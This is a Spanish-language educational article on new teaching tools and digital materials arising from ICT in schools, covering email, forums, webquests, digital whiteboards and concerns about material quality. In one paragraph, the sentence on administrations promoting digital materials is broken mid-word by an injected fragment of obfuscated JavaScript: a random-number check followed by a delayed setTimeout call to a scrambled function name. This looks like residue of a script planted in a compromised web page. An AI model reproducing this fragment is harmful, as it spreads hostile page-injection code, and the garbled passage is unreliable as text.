LAS NUEVAS HERRAMIENTAS PEDAGÓGICAS SURGIDAS CON LAS NNTT

Autora: Beatriz Berrecosa Pérez

El objetivo de este artículo es conocer de la manera más detallada posible cuáles han sido las nuevas herramientas y métodos que han surgido a raíz de la utilización de las Nuevas tecnologías en el ámbito docente. Por este motivo, se explican detenidamente los diversos usos que puede tener Internet en el proceso educacional, así como los nuevos materiales que tenemos los docentes a nuestro alcance y que nos servirán para mejorar de manera significativa la forma de impartir la materia.

La aplicación de las TIC (Tecnologías de la Información y la Comunicación) a la docencia ha supuesto el nacimiento de nuevas herramientas educativas que se ponen al servicio de alumnos y profesores. De este modo, encontramos diferentes aplicaciones de Internet en el ámbito educacional:

-       Internet como forma de comunicarse y expresarse: Todos los sujetos que intervienen en la educación (profesores, alumnos, familias, administraciones, etc) pueden solicitar información, intercambiar opiniones o compartir experiencias; ya que con Internet son varias las formas en las que se puede producir la comunicación. La más empleada de las herramientas que nos ofrece Internet es el correo electrónico, ya su asequible uso permite una comunicación rápida y espontánea. También encontramos los chats (conversaciones en tiempo real) y los foros, además de las aulas virtuales, que suponen la base de la educación on-line.

-       Internet como fuente de información: las cantidades ingentes de información que podemos encontrar en Internet hace que la información pueda ser tratada desde numerosos puntos de vista: revistas digitales, bibliotecas virtuales, listas de distribución, etc., allanan la tarea a los docentes a la hora de estar informados.

-       Internet como soporte didáctico: el docente puede servirse de Internet como complemento de su materia o como refuerzo y apoyo para los ACNEE, para ello puede utilizar los materiales ya existentes o crear unos propios. Un ejemplo puede ser la creación de páginas webs por parte del profesor o de los alumnos en las que se pueda compartir materiales; o las web-quest, que consiste en que los alumnos, organizados de manera grupal, participan activamente y buscan información en Internet para resolver una investigación planteada en clase. (http://www.phpwebquest.org/wq/webquest_lenguas/index.htm)

-        En este apartado también es importante hablar de la pizarra digital, que tiene numerosas ventajas, entre las que podemos destacar la motivación extra para los alumnos al ser un elemento novedoso o la flexibilidad que supone para el docente al poderse adaptar a diferentes modos de enseñanza.

-       Internet como soporte para el trabajo colectivo: el hecho de que Internet suponga la eliminación de barreras espaciales y temporales posibilita que un grupo de alumnos del mismo centro o de diferentes centros puedan realizar un mismo proyecto, compartir experiencias, debatir sobre temas de interés, etc.

-       Internet como herramienta para la gestión de los centros educativos: hasta ahora hemos visto las ventajas que suponía la utilización de las TIC para los docentes y los alumnos; sin embargo, no hay que olvidar que éstas también pueden ser una herramienta muy útil a la hora de realizar las tareas administrativas propias de cada centro: gestión de nóminas, control de horarios, reuniones con los padres, tutorías, datos de los alumnos y personal docente y no docente, etc.

Aparte de las herramientas pedagógicas, en este artículo no podía faltar el hablar de los nuevos materiales didácticos que han surgido como consecuencia de la integración de las NNTT en la educación. En este sentido, hay que reflexionar acerca de si los recursos novedosos que tenemos a nuestro alcance surgen únicamente como materiales complementarios a los contenidos explicados en clase o bien suponen una nueva forma de enseñanza.

Además, hay que tener presente que el uso de los recursos que han sido creados por alumnos y docentes tienen numerosas ventajas, pero también algunos inconvenientes, como por ejemplo que la actualización o la calidad de las páginas web no sean adecuadas.

En general, los nuevos materiales surgidos han sido credos por profesores, editoriales o instituciones relacionadas con la enseñanza que pretenden impulsar el aprendizaje de los alumnos. Habitualmente, los materiales están dirigidos a los docentes, aunque también pueden ir destinados a los alumnos e incluso a sus padres, y sirven como refuerzo y apoyo de las materias que estudian en clase. Actualmente y cada vez más, desde las administraciones se está impulsandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el desarrollo de materiales educativos digitales tanto para utilizar dentro del aula como fuera, y que cubren totalmente todas las asignaturas que componen los programas educativos.

Por otro lado, existen webs que aunque no han sido creadas específicamente con fines educativos, sí que pueden resultar muy útiles para el aprendizaje. Suelen ser páginas como por ejemplo las de los museos (http://www.muncyt.es/), fundaciones (http://www.lasedades.es/) o bibliotecas (http://www.bne.es/es/Inicio/index.html). También los videojuegos pueden considerarse un recurso educativo ya que permiten al alumno trabajar las habilidades y destrezas, resolver problemas, potencian su creatividad, etc.

Sin embargo, siempre está en continuo debate la calidad de estos nuevos recursos. Se plantea si gozan de la suficiente rigurosidad científica o si son adecuados para su utilización en clase, y es por este motivo por el que desde algunos sectores se reivindica la creación de un organismo que evalúe los nuevos materiales didácticos. Pero en contra de esa idea, surgen voces que consideran que un organismo evaluador supondría la limitación de la creatividad y proponen que sean los propios profesores y alumnos los que decidieran la calidad o no de dichos materiales.

En conclusión, podemos decir que  las NNTT han puesto a nuestro alcance numerosas herramientas que suponen una mejora cuantitativa y cualitativa de nuestra enseñanza y resultan más novedosas y atractivas y, por lo tanto, más motivadoras para los alumnos que los métodos tradicionales de enseñanza. Sin embargo, no hay que perder de vista el hecho de que se necesita, por parte de las administraciones, más inversiones en este campo y por parte de los docentes, formación que nos capacite para un óptimo uso y aprovechamiento de estos medios.

BIBLIOGRAFÍA

-       Cabero, J. Nuevas tecnologías aplicadas a la educación”. Síntesis.  Madrid, 2006.

WEBGRAFÍA

-       http://www.phpwebquest.org/wq/webquest_lenguas/index.htm

-       http://www.lasedades.es/

-       http://www.muncyt.es/

-       http://www.bne.es/es/Inicio/index.html

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